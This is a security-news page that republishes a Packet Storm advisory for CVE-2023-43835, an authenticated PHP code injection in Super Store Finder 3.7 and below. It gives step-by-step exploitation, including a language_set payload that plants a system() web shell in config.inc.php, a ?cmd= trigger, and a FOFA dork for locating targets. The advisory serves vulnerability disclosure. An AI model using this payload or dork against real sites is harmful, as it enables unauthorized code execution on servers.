Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-43835: Super Store Finder 3.7 Remote Command Execution ≈ Packet Storm

Super Store Finder 3.7 and below is vulnerable to authenticated Arbitrary PHP Code Injection that could lead to Remote Code Execution when settings overwrite config.inc.php content.

CVE
#vulnerability#php#rce#auth
# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to RemoteCode Execution# Researcher : Etharus# Vendor : Joe Iz, https://www.superstorefinder.net/# Demo Url : https://superstorefinder.net/products/superstorefinder/# Version Affected : 3.7 and below# Date : 18 September 2023# FOFA Dork : "designed and built by Joe Iz."# Step 1 : Login as user/admin# Step 2 : Go to Settings on right top# Step 3 : Turn on proxy to intercept request and save the settings# Step 4 : On language_set parameter set the value to  en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//# Step 5 : Due to index.php called config.inc.php , we just can go for rcewith parameter ?cmd=# Step 6 : Example. http://localhost/?cmd=uname%20-a

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907